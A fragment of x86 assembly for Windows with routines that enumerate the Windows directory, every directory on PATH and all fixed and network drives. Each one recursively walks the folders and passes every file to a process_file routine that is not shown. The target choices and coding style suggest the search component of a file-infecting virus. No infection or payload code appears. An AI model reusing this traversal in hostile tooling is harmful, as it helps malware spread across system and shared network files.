
; subroutine: process_windir
; action:     process md directory & all subdirs
;             1. get %windir%
;             2. call process_directory
; input:      EDI=ff_struc
; output:     none

process_windir          proc    pascal
                        local   windir:BYTE:260
                        pusha
                        lea     eax, windir
                        push    eax
                        push    260
                        push    eax
                        callW   GetWindowsDirectoryA
                        pop     edx
                        call    process_directory
                        popa
                        ret
                        endp

; subroutine: process_path
; action:     process all dirs/subdirs from %path%
;             1. get %path%
;             2. parse %path% and call process_directory for each dirname
; input:      EDI=ff_struc
; output:     none

process_path            proc    pascal
                        local   path:BYTE:1024
                        pusha
                        lea     esi, path
                        mov     dword ptr [esi], 'HTAP'
                        mov     byte ptr [esi+4], 0
                        mov     ebx, 1024-1
                        push    ebx
                        push    esi
                        push    esi
                        callW   GetEnvironmentVariableA
                        mov     byte ptr [esi+ebx], 0
__cycle:                mov     edx, esi
__scan:                 lodsb
                        or      al, al
                        jz      __done
                        cmp     al, ';'
                        jne     __scan
__done:                 sub     [esi-1], al
                        call    process_directory
                        or      al, al
                        jnz     __cycle
                        popa
                        ret
                        endp

; subroutine: process_drives
; action:     for each drive (A:..Z:) with type DRIVE_FIXED||DRIVE_REMOTE
;             call subroutine process_directory passing drive's root as arg
; input:      EDI=ff_struc
; output:     none

process_drives:         pusha
                        push    '\:A'
__cycle:                push    esp
                        callW   GetDriveTypeA
                        sub     eax, 3        ; DRIVE_FIXED=3  DRIVE_REMOTE=4
                        cmp     eax, 1
                        ja      __next
                        mov     edx, esp
                        call    process_directory
__next:                 inc     byte ptr [esp]
                        cmp     byte ptr [esp], 'Z'
                        jbe     __cycle
                        pop     ecx
                        popa
                        ret

; subroutine: process_directory
; action:     1. set current directory to one specified by EDX
;             2. find all files in the current directory
;             3. for each found directory (except "."/"..") recursive call;
;                for each found file call process_file
;             4. set current directory to ".."
; input:      EDI=ff_struc
;             EDX=directory name (should be full path if 1st call)
; output:     none

process_directory:      pusha
                        push    edx
                        callW   SetCurrentDirectoryA
                        push    '*.*'
                        mov     eax, esp
                        push    edi
                        push    eax
                        callW   FindFirstFileA
                        pop     ecx
                        mov     esi, eax
                        inc     eax
                        jz      __exit
__cycle:                test    byte ptr [edi].ff_attr, 16
                        jnz     __dir
                        lea     edx, [edi].ff_fullname
                        call    process_file
                        jmp     __next
__dir:                  lea     edx, [edi].ff_fullname
                        cmp     byte ptr [edx], '.'
                        je      __next
                        call    process_directory
__next:                 push    edi
                        push    esi
                        callW   FindNextFileA
                        or      eax, eax
                        jnz     __cycle
__exit:                 push    esi
                        callW   FindClose
                        push    '..'
                        push    esp
                        callW   SetCurrentDirectoryA
                        pop     ecx
                        popa
                        ret

